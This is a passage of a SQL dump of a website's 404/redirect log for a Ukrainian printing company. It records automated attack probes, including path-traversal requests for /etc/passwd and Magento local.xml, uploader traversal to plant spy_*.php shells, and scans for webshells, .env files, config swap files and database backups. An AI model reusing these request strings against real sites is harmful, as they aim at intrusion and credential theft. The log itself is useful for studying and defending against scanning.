00:00:00',301),(18229,'https://ekvatorprint.com.ua/forum',NULL,'','',6,0,'2020-11-10 05:02:15','0000-00-00 00:00:00',301),(18230,'https://ekvatorprint.com.ua/boards',NULL,'','',1,0,'2020-11-10 05:02:27','0000-00-00 00:00:00',301),(18231,'https://ekvatorprint.com.ua/foro',NULL,'','',1,0,'2020-11-10 05:02:43','0000-00-00 00:00:00',301),(18232,'https://ekvatorprint.com.ua/foro/',NULL,'','',1,0,'2020-11-10 05:02:44','0000-00-00 00:00:00',301),(18233,'https://ekvatorprint.com.ua/images/gmapfp/mohamedxo.php.jpg',NULL,'','',2,0,'2020-11-13 18:59:01','0000-00-00 00:00:00',301),(18234,'https://ekvatorprint.com.ua/assets/images/wp_wrong_datlib.php',NULL,'','',4,0,'2020-11-15 03:22:37','0000-00-00 00:00:00',301),(18235,'https://ekvatorprint.com.ua/components/com_acym/index.html',NULL,'http://www.google.com/','',5,0,'2020-11-15 15:39:41','0000-00-00 00:00:00',301),(18236,'https://ekvatorprint.com.ua/wp-content/plugins/wp-file-manager/css/jquery-ui.css',NULL,'','',1,0,'2020-11-17 12:51:37','0000-00-00 00:00:00',301),(18237,'https://ekvatorprint.com.ua//2020/wp-includes/wlwmanifest.xml',NULL,'','',18,0,'2020-11-19 20:45:05','0000-00-00 00:00:00',301),(18238,'https://ekvatorprint.com.ua/webstat/',NULL,'','',1,0,'2020-11-22 03:47:11','0000-00-00 00:00:00',301),(18239,'https://ekvatorprint.com.ua/usage/',NULL,'','',1,0,'2020-11-22 06:01:13','0000-00-00 00:00:00',301),(18240,'https://ekvatorprint.com.ua/stat/',NULL,'','',1,0,'2020-11-22 22:38:19','0000-00-00 00:00:00',301),(18241,'https://ekvatorprint.com.ua/webalizer/',NULL,'','',1,0,'2020-11-23 01:50:51','0000-00-00 00:00:00',301),(18242,'https://ekvatorprint.com.ua/print-great-photos/templates/gk_ilife/favicon.ico',NULL,'','',2,0,'2020-11-24 14:14:29','0000-00-00 00:00:00',301),(18243,'https://ekvatorprint.com.ua/libs/js/iframe.js',NULL,'','',1,0,'2020-11-25 04:29:16','0000-00-00 00:00:00',301),(18244,'https://ekvatorprint.com.ua/printing-on-canvasэ',NULL,'','',1,0,'2020-11-25 16:48:24','0000-00-00 00:00:00',301),(18245,'https://ekvatorprint.com.ua/wp-content/plugins/advanced_file_manager_5/php/connector.minimal.php',NULL,'http://www.google.com/','',5,0,'2020-11-27 02:20:31','0000-00-00 00:00:00',301),(18246,'https://ekvatorprint.com.ua/index.php?id=17&itemid=18&option=com_content\'[0]&view=article',NULL,'https://ekvatorprint.com.ua/index.php?id=17&Itemid=18&option=com_content\'[0]&view=article','',2,0,'2020-11-27 11:20:16','0000-00-00 00:00:00',301),(18247,'https://ekvatorprint.com.ua/index.php?id=17&itemid=18&option=com_content&view=article\'[0]',NULL,'https://ekvatorprint.com.ua/index.php?id=17&Itemid=18&option=com_content&view=article\'[0]','',2,0,'2020-11-27 11:20:16','0000-00-00 00:00:00',301),(18248,'https://ekvatorprint.com.ua/index.php?id=17&itemid=18&option=/etc/passwd&view=article',NULL,'https://ekvatorprint.com.ua/index.php?id=17&Itemid=18&option=/etc/passwd&view=article','',2,0,'2020-11-27 11:20:20','0000-00-00 00:00:00',301),(18249,'https://ekvatorprint.com.ua/index.php?id=17&itemid=18&option=com_content&view=/etc/passwd',NULL,'https://ekvatorprint.com.ua/index.php?id=17&Itemid=18&option=com_content&view=/etc/passwd','',2,0,'2020-11-27 11:20:21','0000-00-00 00:00:00',301),(18250,'https://ekvatorprint.com.ua/wp/wp-content/plugins/ioptimization/ioptimize.php?rchk',NULL,'www.google.com','',2,0,'2020-11-27 21:26:56','0000-00-00 00:00:00',301),(18251,'https://ekvatorprint.com.ua/wordpress/wp-content/plugins/ioptimization/ioptimize.php?rchk',NULL,'www.google.com','',2,0,'2020-11-27 21:27:16','0000-00-00 00:00:00',301),(18252,'https://ekvatorprint.com.ua/old/wp-content/plugins/ioptimization/ioptimize.php?rchk',NULL,'www.google.com','',1,0,'2020-11-27 21:27:32','0000-00-00 00:00:00',301),(18253,'https://ekvatorprint.com.ua/new/wp-content/plugins/ioptimization/ioptimize.php?rchk',NULL,'www.google.com','',1,0,'2020-11-27 21:27:48','0000-00-00 00:00:00',301),(18254,'https://ekvatorprint.com.ua/blog/wp-content/plugins/ioptimization/ioptimize.php?rchk',NULL,'www.google.com','',2,0,'2020-11-27 21:28:15','0000-00-00 00:00:00',301),(18255,'https://ekvatorprint.com.ua/test/wp-content/plugins/ioptimization/ioptimize.php?rchk',NULL,'www.google.com','',1,0,'2020-11-27 21:28:34','0000-00-00 00:00:00',301),(18256,'https://ekvatorprint.com.ua/demo/wp-content/plugins/ioptimization/ioptimize.php?rchk',NULL,'www.google.com','',1,0,'2020-11-27 21:28:48','0000-00-00 00:00:00',301),(18257,'https://ekvatorprint.com.ua/admin/wp-content/plugins/ioptimization/ioptimize.php?rchk',NULL,'www.google.com','',1,0,'2020-11-27 21:28:58','0000-00-00 00:00:00',301),(18258,'https://ekvatorprint.com.ua/2020/wp-content/plugins/ioptimization/ioptimize.php?rchk',NULL,'www.google.com','',1,0,'2020-11-27 21:29:40','0000-00-00 00:00:00',301),(18259,'https://ekvatorprint.com.ua/2019/wp-content/plugins/ioptimization/ioptimize.php?rchk',NULL,'www.google.com','',1,0,'2020-11-27 21:29:50','0000-00-00 00:00:00',301),(18260,'https://ekvatorprint.com.ua/modules/global/res/js/elfinder/php/connector.minimal.php',NULL,'http://www.google.com/','',1,0,'2020-11-28 03:28:41','0000-00-00 00:00:00',301),(18261,'https://ekvatorprint.com.ua/modules/tadtools/elfinder/php/connector.minimal.php',NULL,'http://www.google.com/','',1,0,'2020-11-28 09:14:29','0000-00-00 00:00:00',301),(18262,'https://ekvatorprint.com.ua/https://ekvatorprint.com.ua',NULL,'','',1,0,'2020-11-29 17:15:46','0000-00-00 00:00:00',301),(18263,'https://ekvatorprint.com.ua/img/checked.png',NULL,'https://ekvatorprint.com.ua/banner-printing','',5,0,'2020-12-01 06:54:48','0000-00-00 00:00:00',301),(18264,'https://ekvatorprint.com.ua/wp-includes/css/css.php',NULL,'','',58,0,'2020-12-02 14:24:36','0000-00-00 00:00:00',301),(18265,'https://ekvatorprint.com.ua/wp-includes/fonts/css.php',NULL,'','',41,0,'2020-12-02 14:25:14','0000-00-00 00:00:00',301),(18266,'https://ekvatorprint.com.ua/popcorn.php.suspected',NULL,'http://site.ru','',3,0,'2020-12-04 14:27:35','0000-00-00 00:00:00',301),(18267,'https://ekvatorprint.com.ua/catalog/adminhtml_category',NULL,'','',1,0,'2020-12-05 02:09:54','0000-00-00 00:00:00',301),(18268,'https://ekvatorprint.com.ua/backup_2/smith.php.suspected',NULL,'http://site.ru','',2,0,'2020-12-05 08:05:15','0000-00-00 00:00:00',301),(18269,'https://ekvatorprint.com.ua/wp-content/plugins/easy-wp-smtp/',NULL,'google.com','',3,0,'2020-12-06 13:08:05','0000-00-00 00:00:00',301),(18270,'https://ekvatorprint.com.ua/adminer-4.2.5-en.php',NULL,'','',2,0,'2020-12-06 20:22:43','0000-00-00 00:00:00',301),(18271,'https://ekvatorprint.com.ua/adminer-4.3.0-en.php',NULL,'','',2,0,'2020-12-06 20:22:48','0000-00-00 00:00:00',301),(18272,'https://ekvatorprint.com.ua/adminer-4.3.0-mysql-en.php',NULL,'','',2,0,'2020-12-06 20:22:51','0000-00-00 00:00:00',301),(18273,'https://ekvatorprint.com.ua/adminer-4.3.0-mysql.php',NULL,'','',2,0,'2020-12-06 20:22:52','0000-00-00 00:00:00',301),(18274,'https://ekvatorprint.com.ua/adminer-4.3.1-en.php',NULL,'','',1,0,'2020-12-06 20:22:54','0000-00-00 00:00:00',301),(18275,'https://ekvatorprint.com.ua/adminer-4.3.1-mysql-en.php',NULL,'','',1,0,'2020-12-06 20:22:56','0000-00-00 00:00:00',301),(18276,'https://ekvatorprint.com.ua/assets/images/ups.php',NULL,'http://site.ru','',6,0,'2020-12-07 10:51:14','0000-00-00 00:00:00',301),(18277,'https://ekvatorprint.com.ua/images/stories/kreativnaja-reklama/pechat-na-bannere-volkswage.jpg',NULL,'','',14,0,'2020-12-08 11:06:45','0000-00-00 00:00:00',301),(18278,'https://ekvatorprint.com.ua/wp-includes/theme-compat/images.php.suspected',NULL,'http://site.ru','',1,0,'2020-12-09 20:56:49','0000-00-00 00:00:00',301),(18279,'https://ekvatorprint.com.ua/wp-admin/css/colors/coffee/dm2.php',NULL,'http://google.com','',1,0,'2020-12-10 05:21:13','0000-00-00 00:00:00',301),(18280,'https://ekvatorprint.com.ua/plugins/system/xtp.php',NULL,'http://google.com','',2,0,'2020-12-10 11:27:04','0000-00-00 00:00:00',301),(18281,'https://ekvatorprint.com.ua/wp-admin/images/data.php',NULL,'http://google.com','',1,0,'2020-12-10 11:27:29','0000-00-00 00:00:00',301),(18282,'https://ekvatorprint.com.ua/index.php?option=com_b2jcontact&view=loader&type=uploader&owner=component&bid=1&id=138&itemid=138&qqfile=/../../root.php',NULL,'','',1,0,'2020-12-11 17:46:38','0000-00-00 00:00:00',301),(18283,'https://ekvatorprint.com.ua/components/com_b2jcontact/root.php',NULL,'','',1,0,'2020-12-11 17:46:49','0000-00-00 00:00:00',301),(18284,'https://ekvatorprint.com.ua/__media__/js/netsoltrademark.php?d=baidu.com',NULL,'','',1,0,'2020-12-12 11:13:59','0000-00-00 00:00:00',301),(18285,'https://ekvatorprint.com.ua/wp-content/uploads/2016/03/wp-query.php',NULL,'http://google.com','',1,0,'2020-12-13 10:41:08','0000-00-00 00:00:00',301),(18286,'https://ekvatorprint.com.ua/config.bak.php',NULL,'','',56,0,'2020-12-13 11:29:26','0000-00-00 00:00:00',301),(18287,'https://ekvatorprint.com.ua/wp-content/doc.php',NULL,'http://google.com','',3,0,'2020-12-13 18:03:25','0000-00-00 00:00:00',301),(18288,'https://ekvatorprint.com.ua/delivery/templates/gk_ilife/favicon.ico',NULL,'','',1,0,'2020-12-13 21:56:48','0000-00-00 00:00:00',301),(18289,'https://ekvatorprint.com.ua/wp-includes/text/diff/engine/dm2.php',NULL,'http://google.com','',1,0,'2020-12-14 01:21:24','0000-00-00 00:00:00',301),(18290,'https://ekvatorprint.com.ua/wp-content/plugins/ioptimizations/ioptimizes.php?hamlorszd',NULL,'','',3,0,'2020-12-15 11:21:36','0000-00-00 00:00:00',301),(18291,'https://ekvatorprint.com.ua/blog/wp-content/plugins/ioptimizations/ioptimizes.php?hamlorszd',NULL,'','',3,0,'2020-12-15 11:21:38','0000-00-00 00:00:00',301),(18292,'https://ekvatorprint.com.ua/wp/wp-content/plugins/ioptimizations/ioptimizes.php?hamlorszd',NULL,'','',3,0,'2020-12-15 11:21:42','0000-00-00 00:00:00',301),(18293,'https://ekvatorprint.com.ua/wordpress/wp-content/plugins/ioptimizations/ioptimizes.php?hamlorszd',NULL,'','',3,0,'2020-12-15 11:21:44','0000-00-00 00:00:00',301),(18294,'https://ekvatorprint.com.ua/logs/error.php',NULL,'','',2,0,'2020-12-15 14:27:06','0000-00-00 00:00:00',301),(18295,'https://ekvatorprint.com.ua/wp-content/wp-plugins.php',NULL,'http://google.com','',1,0,'2020-12-16 18:39:56','0000-00-00 00:00:00',301),(18296,'https://ekvatorprint.com.ua/libraries/joomla/template/popup-pomo.php.suspected',NULL,'http://google.com','',3,0,'2020-12-17 18:18:22','0000-00-00 00:00:00',301),(18297,'https://ekvatorprint.com.ua/sites/default/settings.php',NULL,'','',2,0,'2020-12-19 22:09:07','0000-00-00 00:00:00',301),(18298,'https://ekvatorprint.com.ua/sites/all/stats.php',NULL,'','',2,0,'2020-12-20 04:56:36','0000-00-00 00:00:00',301),(18299,'https://ekvatorprint.com.ua/wp-content/uploads/2020/05/content-post.php',NULL,'http://google.com','',1,0,'2020-12-20 21:47:23','0000-00-00 00:00:00',301),(18300,'https://ekvatorprint.com.ua/modulnye-kartiny/templates/gk_ilife/favicon.ico',NULL,'','',7,0,'2020-12-22 07:15:47','0000-00-00 00:00:00',301),(18301,'https://ekvatorprint.com.ua/anythingnotexistedfileneverbeenhere.sql',NULL,'','',1,0,'2020-12-22 18:49:08','0000-00-00 00:00:00',301),(18302,'https://ekvatorprint.com.ua/db_backup.ekvatorprint.com.ua.sql.gz',NULL,'','',1,0,'2020-12-22 21:54:58','0000-00-00 00:00:00',301),(18303,'https://ekvatorprint.com.ua/db_backup.ekvatorprint.sql.gz',NULL,'','',2,0,'2020-12-23 00:52:25','0000-00-00 00:00:00',301),(18304,'https://ekvatorprint.com.ua/db_backup.sql.gz',NULL,'','',3,0,'2020-12-23 03:52:35','0000-00-00 00:00:00',301),(18305,'https://ekvatorprint.com.ua/db_backup.ekvatorprint.com.ua.sql',NULL,'','',2,0,'2020-12-23 06:59:07','0000-00-00 00:00:00',301),(18306,'https://ekvatorprint.com.ua/db_backup.ekvatorprint.sql',NULL,'','',2,0,'2020-12-23 10:09:26','0000-00-00 00:00:00',301),(18307,'https://ekvatorprint.com.ua/wp-includes/css/buttons.css',NULL,'','',2,0,'2020-12-23 12:57:50','0000-00-00 00:00:00',301),(18308,'https://ekvatorprint.com.ua/db_backup.ekvatorprint.com.ua.tgz',NULL,'','',1,0,'2020-12-23 13:17:11','0000-00-00 00:00:00',301),(18309,'https://ekvatorprint.com.ua/db_backup.ekvatorprint.com.ua.sql.bz',NULL,'','',1,0,'2020-12-23 16:21:31','0000-00-00 00:00:00',301),(18310,'https://ekvatorprint.com.ua/db_backup.ekvatorprint.sql.bz',NULL,'','',1,0,'2020-12-23 19:24:31','0000-00-00 00:00:00',301),(18311,'https://ekvatorprint.com.ua/db_backup.sql.bz',NULL,'','',1,0,'2020-12-23 22:27:03','0000-00-00 00:00:00',301),(18312,'https://ekvatorprint.com.ua/db_backup.ekvatorprint.com.ua.bz',NULL,'','',2,0,'2020-12-24 01:29:42','0000-00-00 00:00:00',301),(18313,'https://ekvatorprint.com.ua/db_backup.ekvatorprint.bz',NULL,'','',1,0,'2020-12-24 04:32:48','0000-00-00 00:00:00',301),(18314,'https://ekvatorprint.com.ua/wp-content/plugins/drag-and-drop-multiple-file-upload-contact-form-7/assets/css/dnd-upload-cf7.css',NULL,'www.google.com','',1,0,'2020-12-24 05:41:09','0000-00-00 00:00:00',301),(18315,'https://ekvatorprint.com.ua/db_backup.ekvatorprint.com.ua.sql.bz2',NULL,'','',1,0,'2020-12-24 10:36:36','0000-00-00 00:00:00',301),(18316,'https://ekvatorprint.com.ua/db_backup.ekvatorprint.sql.bz2',NULL,'','',1,0,'2020-12-24 13:34:36','0000-00-00 00:00:00',301),(18317,'https://ekvatorprint.com.ua/db_backup.sql.bz2',NULL,'','',1,0,'2020-12-24 16:35:03','0000-00-00 00:00:00',301),(18318,'https://ekvatorprint.com.ua/db_backup.ekvatorprint.com.ua.bz2',NULL,'','',2,0,'2020-12-24 19:36:04','0000-00-00 00:00:00',301),(18319,'https://ekvatorprint.com.ua/db_backup.ekvatorprint.bz2',NULL,'','',1,0,'2020-12-24 22:39:35','0000-00-00 00:00:00',301),(18320,'https://ekvatorprint.com.ua/ekvatorprint.com.ua_magento.sql',NULL,'','',1,0,'2020-12-25 04:54:04','0000-00-00 00:00:00',301),(18321,'https://ekvatorprint.com.ua/ekvatorprint.com.ua_wp.sql',NULL,'','',1,0,'2020-12-25 08:06:23','0000-00-00 00:00:00',301),(18322,'https://ekvatorprint.com.ua/ekvatorprint.com.ua_blog.sql',NULL,'','',1,0,'2020-12-25 11:18:15','0000-00-00 00:00:00',301),(18323,'https://ekvatorprint.com.ua/ekvatorprint.com.ua_wordpress.sql',NULL,'','',1,0,'2020-12-25 14:30:46','0000-00-00 00:00:00',301),(18324,'https://ekvatorprint.com.ua/ekvatorprint.com.ua_db.sql',NULL,'','',4,0,'2020-12-25 17:43:43','0000-00-00 00:00:00',301),(18325,'https://ekvatorprint.com.ua/ekvatorprint.com.ua_magento.sql.gz',NULL,'','',1,0,'2020-12-25 21:01:30','0000-00-00 00:00:00',301),(18326,'https://ekvatorprint.com.ua/ekvatorprint.com.ua_wp.sql.gz',NULL,'','',1,0,'2020-12-26 00:24:23','0000-00-00 00:00:00',301),(18327,'https://ekvatorprint.com.ua/ekvatorprint.com.ua_blog.sql.gz',NULL,'','',1,0,'2020-12-26 03:46:28','0000-00-00 00:00:00',301),(18328,'https://ekvatorprint.com.ua/ekvatorprint.com.ua_wordpress.sql.gz',NULL,'','',1,0,'2020-12-26 07:09:00','0000-00-00 00:00:00',301),(18329,'https://ekvatorprint.com.ua/ekvatorprint.com.ua_db.sql.gz',NULL,'','',4,0,'2020-12-26 10:32:01','0000-00-00 00:00:00',301),(18330,'https://ekvatorprint.com.ua/ekvatorprint_magento.sql',NULL,'','',1,0,'2020-12-26 14:00:27','0000-00-00 00:00:00',301),(18331,'https://ekvatorprint.com.ua/internet-katalog-modulnykh-karti',NULL,'','',1,0,'2020-12-26 16:16:15','0000-00-00 00:00:00',301),(18332,'https://ekvatorprint.com.ua/internet-k',NULL,'','',1,0,'2020-12-26 16:16:18','0000-00-00 00:00:00',301),(18333,'https://ekvatorprint.com.ua/intern',NULL,'','',1,0,'2020-12-26 16:16:18','0000-00-00 00:00:00',301),(18334,'https://ekvatorprint.com.ua/in',NULL,'','',1,0,'2020-12-26 16:16:18','0000-00-00 00:00:00',301),(18335,'https://ekvatorprint.com.ua/internet',NULL,'','',1,0,'2020-12-26 16:16:19','0000-00-00 00:00:00',301),(18336,'https://ekvatorprint.com.ua/inte',NULL,'','',1,0,'2020-12-26 16:16:19','0000-00-00 00:00:00',301),(18337,'https://ekvatorprint.com.ua/ekvatorprint_wp.sql',NULL,'','',1,0,'2020-12-26 17:33:49','0000-00-00 00:00:00',301),(18338,'https://ekvatorprint.com.ua/ekvatorprint_blog.sql',NULL,'','',1,0,'2020-12-26 21:11:23','0000-00-00 00:00:00',301),(18339,'https://ekvatorprint.com.ua/ekvatorprint_wordpress.sql',NULL,'','',1,0,'2020-12-27 00:52:40','0000-00-00 00:00:00',301),(18340,'https://ekvatorprint.com.ua/vendor/phpunit/phpunit/src/util/php/xsamxadoo_bot.php',NULL,'','',1,0,'2020-12-27 04:49:47','0000-00-00 00:00:00',301),(18341,'https://ekvatorprint.com.ua/vendor/phpunit/phpunit/src/util/php/xsamxadoo_bot_.php',NULL,'','',1,0,'2020-12-27 04:49:49','0000-00-00 00:00:00',301),(18342,'https://ekvatorprint.com.ua/ekvatorprint_magento.sql.gz',NULL,'','',1,0,'2020-12-27 08:18:21','0000-00-00 00:00:00',301),(18343,'https://ekvatorprint.com.ua/ekvatorprint_wp.sql.gz',NULL,'','',1,0,'2020-12-27 12:01:35','0000-00-00 00:00:00',301),(18344,'https://ekvatorprint.com.ua/ekvatorprint_blog.sql.gz',NULL,'','',1,0,'2020-12-27 16:01:41','0000-00-00 00:00:00',301),(18345,'https://ekvatorprint.com.ua/ekvatorprint_wordpress.sql.gz',NULL,'','',1,0,'2020-12-27 22:57:11','0000-00-00 00:00:00',301),(18346,'https://ekvatorprint.com.ua/components/com_comprofiler/js/menubest.min.js',NULL,'','',1,0,'2020-12-28 15:44:44','0000-00-00 00:00:00',301),(18347,'https://ekvatorprint.com.ua/magmi/conf/sql_datasource.conf',NULL,'','',1,0,'2020-12-28 16:40:01','0000-00-00 00:00:00',301),(18348,'https://ekvatorprint.com.ua/makefile',NULL,'','',1,0,'2020-12-28 21:09:24','0000-00-00 00:00:00',301),(18349,'https://ekvatorprint.com.ua/admin.rar',NULL,'','',3,0,'2020-12-29 00:36:38','0000-00-00 00:00:00',301),(18350,'https://ekvatorprint.com.ua/admin.tgz',NULL,'','',2,0,'2020-12-29 08:07:00','0000-00-00 00:00:00',301),(18351,'https://ekvatorprint.com.ua/emergency.php',NULL,'www.google.com','',5,0,'2020-12-29 20:07:33','0000-00-00 00:00:00',301),(18352,'https://ekvatorprint.com.ua/wp-content/themes/wp-update.php',NULL,'www.google.com','',2,0,'2020-12-29 20:07:53','0000-00-00 00:00:00',301),(18353,'https://ekvatorprint.com.ua/em1_bridge_db_dump001.sql',NULL,'','',1,0,'2020-12-30 00:39:57','0000-00-00 00:00:00',301),(18354,'https://ekvatorprint.com.ua/tmp/em1_bridge_db_dump001.sql',NULL,'','',1,0,'2020-12-30 09:36:54','0000-00-00 00:00:00',301),(18355,'https://ekvatorprint.com.ua/temp/em1_bridge_db_dump001.sql',NULL,'','',1,0,'2020-12-30 18:17:24','0000-00-00 00:00:00',301),(18356,'https://ekvatorprint.com.ua/.wp-config.php.swp',NULL,'','',2,0,'2020-12-31 04:24:11','0000-00-00 00:00:00',301),(18357,'https://ekvatorprint.com.ua/blog/.wp-config.php.swp',NULL,'','',1,0,'2020-12-31 14:53:59','0000-00-00 00:00:00',301),(18358,'https://ekvatorprint.com.ua/wp/.wp-config.php.swp',NULL,'','',1,0,'2021-01-01 02:08:20','0000-00-00 00:00:00',301),(18359,'https://ekvatorprint.com.ua/wordpress/.wp-config.php.swp',NULL,'','',1,0,'2021-01-01 13:53:31','0000-00-00 00:00:00',301),(18360,'https://ekvatorprint.com.ua/app/etc/.loca.xml.swp',NULL,'','',1,0,'2021-01-02 02:00:59','0000-00-00 00:00:00',301),(18361,'https://ekvatorprint.com.ua/app/etc/.env.php.swp',NULL,'','',1,0,'2021-01-02 13:48:00','0000-00-00 00:00:00',301),(18362,'https://ekvatorprint.com.ua/spy.php?spy',NULL,'','',2,0,'2021-01-02 22:00:24','0000-00-00 00:00:00',301),(18363,'https://ekvatorprint.com.ua/images/jdownloads/screenshots/spyking.php3.g?spy',NULL,'','',2,0,'2021-01-02 22:00:28','0000-00-00 00:00:00',301),(18364,'https://ekvatorprint.com.ua/components/com_jbcatalog/libraries/jsupload/',NULL,'','',2,0,'2021-01-02 22:00:29','0000-00-00 00:00:00',301),(18365,'https://ekvatorprint.com.ua/index.php?option=com_b2jcontact&view=loader&type=uploader&owner=component&bid=1&qqfile=/../../../spy_1609622951.php',NULL,'','',1,0,'2021-01-02 22:00:31','0000-00-00 00:00:00',301),(18366,'https://ekvatorprint.com.ua/components/spy_1609622951.php',NULL,'','',1,0,'2021-01-02 22:00:33','0000-00-00 00:00:00',301),(18367,'https://ekvatorprint.com.ua/index.php?option=com_foxcontact&view=invalid',NULL,'','',2,0,'2021-01-02 22:00:39','0000-00-00 00:00:00',301),(18368,'https://ekvatorprint.com.ua/wp-content/aiowps_backups/backup.wp-config.php',NULL,'','',1,0,'2021-01-03 02:44:32','0000-00-00 00:00:00',301),(18369,'https://ekvatorprint.com.ua/public/assets/plugins/jquery-file-upload/server/php/index.php',NULL,'http://www.google.com/','',2,0,'2021-01-03 07:47:17','0000-00-00 00:00:00',301),(18370,'https://ekvatorprint.com.ua/.foo.swp',NULL,'','',1,0,'2021-01-03 16:29:20','0000-00-00 00:00:00',301),(18371,'https://ekvatorprint.com.ua/staging_db.sql.gz',NULL,'','',1,0,'2021-01-04 05:52:27','0000-00-00 00:00:00',301),(18372,'https://ekvatorprint.com.ua/staging_db.sql',NULL,'','',1,0,'2021-01-04 19:54:51','0000-00-00 00:00:00',301),(18373,'https://ekvatorprint.com.ua/login',NULL,'','',18,0,'2021-01-05 09:12:21','0000-00-00 00:00:00',301),(18374,'https://ekvatorprint.com.ua/register',NULL,'','',2,0,'2021-01-05 09:12:53','0000-00-00 00:00:00',301),(18375,'https://ekvatorprint.com.ua/registration',NULL,'','',22,0,'2021-01-05 09:12:57','0000-00-00 00:00:00',301),(18376,'https://ekvatorprint.com.ua/staging_db.sql.zip',NULL,'','',1,0,'2021-01-05 09:51:30','0000-00-00 00:00:00',301),(18377,'https://ekvatorprint.com.ua/dev_db.sql.gz',NULL,'','',1,0,'2021-01-06 00:23:15','0000-00-00 00:00:00',301),(18378,'https://ekvatorprint.com.ua/media/vendor/plupload/examples/upload.php',NULL,'http://www.google.com/','',1,0,'2021-01-06 03:40:57','0000-00-00 00:00:00',301),(18379,'https://ekvatorprint.com.ua/modules/tadgallery/class/plupload/examples/upload.php',NULL,'http://www.google.com/','',1,0,'2021-01-06 03:45:07','0000-00-00 00:00:00',301),(18380,'https://ekvatorprint.com.ua/dev_db.sql',NULL,'','',1,0,'2021-01-06 14:16:32','0000-00-00 00:00:00',301),(18381,'https://ekvatorprint.com.ua/components/ms2form/vendor/plupload/examples/upload.php',NULL,'http://www.google.com/','',1,0,'2021-01-07 03:07:17','0000-00-00 00:00:00',301),(18382,'https://ekvatorprint.com.ua/images/pimeri_shablonov/мш-3-4@2x.png',NULL,'','',1,0,'2021-01-07 04:11:35','0000-00-00 00:00:00',301),(18383,'https://ekvatorprint.com.ua/dev_db.sql.zip',NULL,'','',1,0,'2021-01-07 05:27:49','0000-00-00 00:00:00',301),(18384,'https://ekvatorprint.com.ua/img/header_bg.png',NULL,'https://ekvatorprint.com.ua/','',2,0,'2021-01-07 08:56:25','0000-00-00 00:00:00',301),(18385,'https://ekvatorprint.com.ua/developer.sql.gz',NULL,'','',2,0,'2021-01-07 20:53:31','0000-00-00 00:00:00',301),(18386,'https://ekvatorprint.com.ua/developer.sql',NULL,'','',2,0,'2021-01-08 11:54:22','0000-00-00 00:00:00',301),(18387,'https://ekvatorprint.com.ua/developer.zip',NULL,'','',2,0,'2021-01-09 03:09:30','0000-00-00 00:00:00',301),(18388,'https://ekvatorprint.com.ua/wp-zero.php',NULL,'','',2,0,'2021-01-09 08:28:18','0000-00-00 00:00:00',301),(18389,'https://ekvatorprint.com.ua/internet-katalog-modulnykh-kartin/templates/gk_ilife/favicon.ico',NULL,'','',3,0,'2021-01-09 09:59:36','0000-00-00 00:00:00',301),(18390,'https://ekvatorprint.com.ua/developer.rar',NULL,'','',3,0,'2021-01-09 18:11:45','0000-00-00 00:00:00',301),(18391,'https://ekvatorprint.com.ua/developer.tar',NULL,'','',2,0,'2021-01-10 09:46:35','0000-00-00 00:00:00',301),(18392,'https://ekvatorprint.com.ua/sites/all/libraries/elfinder/elfinder.html',NULL,'http://www.google.com/','',2,0,'2021-01-10 11:07:16','0000-00-00 00:00:00',301),(18393,'https://ekvatorprint.com.ua/developer.tar.gz',NULL,'','',2,0,'2021-01-11 03:14:32','0000-00-00 00:00:00',301),(18394,'https://ekvatorprint.com.ua/misc/print.css',NULL,'http://www.google.com/','',3,0,'2021-01-11 12:53:21','0000-00-00 00:00:00',301),(18395,'https://ekvatorprint.com.ua/popcorn.php?ti=kung',NULL,'','',2,0,'2021-01-11 20:24:48','0000-00-00 00:00:00',301),(18396,'https://ekvatorprint.com.ua/.zip',NULL,'','',2,0,'2021-01-11 22:52:39','0000-00-00 00:00:00',301),(18397,'https://ekvatorprint.com.ua/themes/readme.txt',NULL,'http://www.google.com/','',2,0,'2021-01-12 02:14:21','0000-00-00 00:00:00',301),(18398,'https://ekvatorprint.com.ua/sites/all/libraries/elfinder/connectors/php/connector.php',NULL,'http://www.google.com/','',4,0,'2021-01-12 07:42:32','0000-00-00 00:00:00',301),(18399,'https://ekvatorprint.com.ua/sites/all/libraries/elfinder/src/connectors/php/connector.php',NULL,'http://www.google.com/','',3,0,'2021-01-12 07:43:16','0000-00-00 00:00:00',301),(18400,'https://ekvatorprint.com.ua/database.db',NULL,'','',1,0,'2021-01-12 19:16:11','0000-00-00 00:00:00',301),(18401,'https://ekvatorprint.com.ua/database.sqlite3',NULL,'','',1,0,'2021-01-13 22:48:09','0000-00-00 00:00:00',301),(18402,'https://ekvatorprint.com.ua/magmi-importer/conf/magmi.ini',NULL,'','',1,0,'2021-01-15 08:22:55','0000-00-00 00:00:00',301),(18403,'https://ekvatorprint.com.ua/magmi-importer/web/download_file.php?file=../../app/etc/local.xml',NULL,'','',2,0,'2021-01-15 08:27:13','0000-00-00 00:00:00',301),(18404,'https://ekvatorprint.com.ua/magmi/web/download_file.php?file=../../app/etc/local.xml',NULL,'','',2,0,'2021-01-15 08:27:30','0000-00-00 00:00:00',301),(18405,'https://ekvatorprint.com.ua/database.sqlitedb',NULL,'','',1,0,'2021-01-15 18:53:42','0000-00-00 00:00:00',301),(18406,'https://ekvatorprint.com.ua/__media__/js/netsoltrademark.php?d=evksuf13mc.com',NULL,'','',1,0,'2021-01-16 21:23:48','0000-00-00 00:00:00',301),(18407,'https://ekvatorprint.com.ua/database.db3',NULL,'','',1,0,'2021-01-17 00:13:05','0000-00-00 00:00:00',301),(18408,'https://ekvatorprint.com.ua/index.php?option=com_b2jcontact&view=loader&type=uploader&owner=component&bid=1&qqfile=/../../../spy_1610872784.php',NULL,'','',1,0,'2021-01-17 12:53:16','0000-00-00 00:00:00',301),(18409,'https://ekvatorprint.com.ua/components/spy_1610872784.php',NULL,'','',1,0,'2021-01-17 12:53:16','0000-00-00 00:00:00',301),(18410,'https://ekvatorprint.com.ua/storage/.env',NULL,'','',36,0,'2021-01-17 15:02:15','0000-00-00 00:00:00',301),(18411,'https://ekvatorprint.com.ua/backups.php?key=c6y1f2ea7217pbtl1flch98sopfo/r1z76/okfae&mode=config',NULL,'','',2,0,'2021-01-19 08:55:48','0000-00-00 00:00:00',301),(18412,'https://ekvatorprint.com.ua/generator/',NULL,'','',1,0,'2021-01-21 21:47:45','0000-00-00 00:00:00',301),(18413,'https://ekvatorprint.com.ua/printing-on-canvas/adminiatrator',NULL,'','',1,0,'2021-01-22 15:02:07','0000-00-00 00:00:00',301),(18414,'https://ekvatorprint.com.ua/printing-on-canvas/adminiastrator',NULL,'','',1,0,'2021-01-22 15:02:20','0000-00-00 00:00:00',301),(18415,'https://ekvatorprint.com.ua/printing-on-canvas/administrator',NULL,'','',2,0,'2021-01-22 15:02:27','0000-00-00 